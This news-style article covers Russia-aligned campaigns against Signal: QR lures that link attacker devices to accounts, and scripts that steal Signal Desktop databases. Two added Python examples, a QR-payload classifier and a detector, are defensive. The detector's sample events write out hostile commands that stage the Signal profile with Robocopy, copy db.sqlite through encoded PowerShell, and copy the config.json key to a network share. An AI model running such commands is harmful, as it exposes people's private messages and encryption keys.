Russian state-aligned hackers have been targeting Signal Messenger accounts, focusing on military personnel, politicians, journalists, and activists. These efforts, driven by wartime intelligence requirements following the invasion of Ukraine, aim to get inside encrypted conversations and extract sensitive information.
Secure messaging applications, and Signal in particular, have long been a refuge for people seeking private communication, which is exactly what makes them a prime target for state-backed threat actors. In this campaign, researchers observed the attackers using a mix of phishing and malware to compromise accounts and gain persistent access to victims' messages.
Researchers have observed one key tactic in these attacks: abuse of Signal's 'linked devices' feature, which lets a user add a desktop or other secondary device to their account by scanning a QR code with their phone. The attackers' QR codes were delivered in the guise of group invites or security alerts. When the victim scans one, their account is linked to an attacker-controlled device, which then receives every subsequent message in real time. No malware has to run on the victim's phone; the rogue device is simply treated as one of the victim's own.
UNC5792, one of several Russian-aligned threat actors involved, was found using fake Signal group invitations to compromise accounts. Another group, UNC4221, deployed a phishing kit imitating the Ukrainian military's Kropyva artillery guidance app. The kit embeds malicious QR codes in fake security alerts and invites, tricking users into linking their accounts to adversary-controlled devices.
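To show what the abuse above looks like at the payload level, here is an added example (not code from the article, the researchers, or Signal): a small classifier for the text a QR code decodes to. It assumes the two payload shapes Signal uses, sgnl://linkdevice?uuid=<device id>&pub_key=<key> for linking a device and https://signal.group/#<invite data> for a group invite; the lure texts and payloads in it are constructed.

```python
"""Inspect what a Signal-branded QR code decodes to before scanning it.

Added example for this article; it is not code from the article, the
researchers, or Signal. It assumes the two payload shapes Signal uses:
device-linking URIs, sgnl://linkdevice?uuid=<device id>&pub_key=<key>,
and group invite links, https://signal.group/#<invite data>.
All sample payloads below are constructed.
"""
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass(frozen=True)
class QrVerdict:
    kind: str           # "device-link", "group-invite" or "unknown"
    links_device: bool  # True if scanning it in Signal would add a linked device
    reason: str


def classify_signal_qr(payload: str) -> QrVerdict:
    """Classify a decoded QR payload by what Signal would do if it were scanned."""
    parts = urlsplit(payload.strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()

    # A provisioning URI: "uuid" identifies the device asking to be linked and
    # "pub_key" is its public key. Signal does not care whether the lure around
    # the QR code said "group invite" or "security alert"; it links the device.
    if scheme == "sgnl" and host == "linkdevice":
        params = parse_qs(parts.query)
        missing = [k for k in ("uuid", "pub_key") if k not in params]
        if missing:
            return QrVerdict("device-link", True,
                             "linking URI missing " + ", ".join(missing) + "; still a linking attempt")
        return QrVerdict("device-link", True,
                         "scanning registers the device that generated this code as a reader of the account")

    # A genuine group invite is an https link on signal.group with the invite in the fragment.
    if scheme == "https" and host == "signal.group" and parts.fragment:
        return QrVerdict("group-invite", False, "group invite link; joining a group never links a device")

    return QrVerdict("unknown", False, "not a Signal group invite; do not scan it into Signal")


# Constructed lures in the style the article describes: the text shown to the
# victim next to the QR code versus what the code actually decodes to.
SAMPLE_LURES = {
    "Join the 'Artillery coordination' group":
        "https://signal.group/#CjQKIHRoaXMtaXMtY29uc3RydWN0ZWQtaW52aXRlLWRhdGE",
    "Security alert: scan to confirm your account":
        "sgnl://linkdevice?uuid=7f3c2b1a-0000-4000-8000-000000000001&pub_key=BQ%2Bconstructed%2Fkey",
    "Kropyva update: scan to verify":
        "sgnl://linkdevice?uuid=7f3c2b1a-0000-4000-8000-000000000002",
    "Read more":
        "https://example.invalid/group-invite",
}


def triage(lures: dict) -> list:
    """Return (lure text, kind, links_device) per lure so the mismatch is visible."""
    out = []
    for label, payload in lures.items():
        verdict = classify_signal_qr(payload)
        out.append((label, verdict.kind, verdict.links_device))
    return out


if __name__ == "__main__":
    for label, kind, links in triage(SAMPLE_LURES):
        print(f"{'LINKS DEVICE' if links else 'ok          '}  {kind:12}  {label}")
```

The point is the mismatch the victim cannot see: whatever the surrounding message says, a sgnl://linkdevice payload is a request to register the code's author as a device on the account. Any QR reader app can show the raw decoded text, so checking it before handing the code to Signal costs a few seconds.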

Researchers also observed UNC4221 using a JavaScript-based payload, tracked as PINPOINT and embedded in its phishing pages, to collect geolocation and other user data.
Beyond remote phishing, researchers also found that Russian and Belarusian actors have been developing malware and scripts to steal Signal database files directly from Android devices and from Signal Desktop installations on Windows:
- APT44 (Sandworm/Seashell Blizzard): Uses the Wavesign script to extract Signal messages from Windows devices.
- Infamous Chisel (Sandworm-linked malware): Searches for Signal database files on Android devices.
- Turla (FSB-affiliated): Employs PowerShell scripts to steal messages from Signal Desktop.
- UNC1151 (Belarus-linked): Uses the Robocopy utility to stage Signal Desktop data for exfiltration.
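All four of the file-theft techniques above end up touching Signal Desktop's data directory, which on Windows is %APPDATA%\Signal, with the message store in sql\db.sqlite and the database key in config.json. The detection logic below is an added example, not code from the article or the researchers cited: it runs over constructed process-creation and file-access events in an assumed schema, ignores Signal.exe reading its own files, and decodes PowerShell -EncodedCommand arguments so an encoded path is not missed. Robocopy and PowerShell come from the article; the other staging tools in the list are the author's assumptions.

```python
"""Flag processes other than Signal Desktop that touch its data directory.

Added example for this article; it is not code from the article or from the
researchers cited. It assumes the constructed event schema below (one record
per process-creation or file-access event, with the command line or target
path in `text`). Paths are Signal Desktop's on Windows: %APPDATA%\\Signal,
with the message store in sql\\db.sqlite and the database key in config.json.
Robocopy and PowerShell come from the article; the other staging tools listed
are the author's assumptions.
"""
import base64
import re
from dataclasses import dataclass

# Any spelling of the Signal Desktop profile directory an attacker's command might use.
SIGNAL_DATA_DIR = re.compile(
    r"(?:\\AppData\\Roaming|%APPDATA%|\$env:APPDATA)\\Signal\b", re.IGNORECASE)
# The two files that, together, yield the decrypted message history.
SIGNAL_SECRETS = re.compile(r"Signal\\(?:sql\\db\.sqlite|config\.json)", re.IGNORECASE)
# PowerShell -EncodedCommand (base64 of UTF-16LE) hides the path from a naive string match.
ENCODED_CMD = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Tools commonly used to stage or pack files before exfiltration (assumption beyond the article).
STAGING_TOOLS = {"robocopy.exe", "xcopy.exe", "cmd.exe", "powershell.exe",
                 "pwsh.exe", "7z.exe", "rar.exe", "esentutl.exe"}


@dataclass(frozen=True)
class Event:
    host: str
    user: str
    image: str   # full path of the acting process
    text: str    # command line (process creation) or target path (file access)


def expand_encoded_powershell(text: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so the path rules can see it."""
    m = ENCODED_CMD.search(text)
    if not m:
        return text
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text
    return text + " " + decoded


def signal_desktop_alerts(events) -> list:
    """Return one alert dict per event where a foreign process reaches into Signal's profile."""
    alerts = []
    for ev in events:
        image_name = ev.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if image_name == "signal.exe":
            continue  # Signal Desktop reading its own database is the expected case
        text = expand_encoded_powershell(ev.text)
        if not SIGNAL_DATA_DIR.search(text):
            continue
        touches_secrets = bool(SIGNAL_SECRETS.search(text))
        staged = image_name in STAGING_TOOLS
        severity = "high" if touches_secrets or staged else "medium"
        alerts.append({"host": ev.host, "user": ev.user, "image": image_name,
                       "severity": severity,
                       "why": ("db.sqlite/config.json" if touches_secrets else "Signal profile dir")
                              + (" via staging tool" if staged else "")})
    return alerts


# Constructed events: a benign Signal Desktop read, a Robocopy staging run, an
# encoded PowerShell copy of the database, an unrelated file, a cmd.exe copy of
# the key file to a share, and a backup agent reading a Signal log.
_ENC = base64.b64encode(
    'Copy-Item "$env:APPDATA\\Signal\\sql\\db.sqlite" C:\\ProgramData\\upd.db'.encode("utf-16-le")
).decode()

SAMPLE_EVENTS = [
    Event("WS01", "alice", r"C:\Users\alice\AppData\Local\Programs\signal-desktop\Signal.exe",
          r"C:\Users\alice\AppData\Roaming\Signal\sql\db.sqlite"),
    Event("WS01", "alice", r"C:\Windows\System32\Robocopy.exe",
          r'robocopy "C:\Users\alice\AppData\Roaming\Signal" "C:\ProgramData\sync" /E /NFL'),
    Event("WS01", "alice", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -enc " + _ENC),
    Event("WS01", "alice", r"C:\Windows\explorer.exe",
          r"C:\Users\alice\Documents\report.docx"),
    Event("WS02", "bob", r"C:\Windows\System32\cmd.exe",
          r'cmd.exe /c copy "C:\Users\bob\AppData\Roaming\Signal\config.json" \\fs01\share\c.json'),
    Event("WS01", "alice", r"C:\Program Files\Backup\backup.exe",
          r"C:\Users\alice\AppData\Roaming\Signal\logs\main.log"),
]

if __name__ == "__main__":
    for alert in signal_desktop_alerts(SAMPLE_EVENTS):
        print(alert)
```

The same two regexes port directly to a Sysmon or EDR rule on process command lines and file-access targets; the medium tier exists because backup and sync agents do legitimately read the profile directory, and a rule that only fires on db.sqlite and config.json would miss a whole-directory Robocopy run like the one above.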
Security professionals advise users to lock mobile devices with a strong alphanumeric password, keep operating systems and apps updated, ensure Google Play Protect is enabled, turn on two-factor authentication (in Signal, Registration Lock), and never scan a QR code they cannot vouch for. Given the tactic described above, it is just as important to open Settings > Linked Devices in Signal periodically and remove any device that is not recognised.
“This threat is not only limited to Signal, but also extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months,” researchers warned.
A few days ago, Elon Musk-owned X started blocking links to Signal.me, citing safety concerns.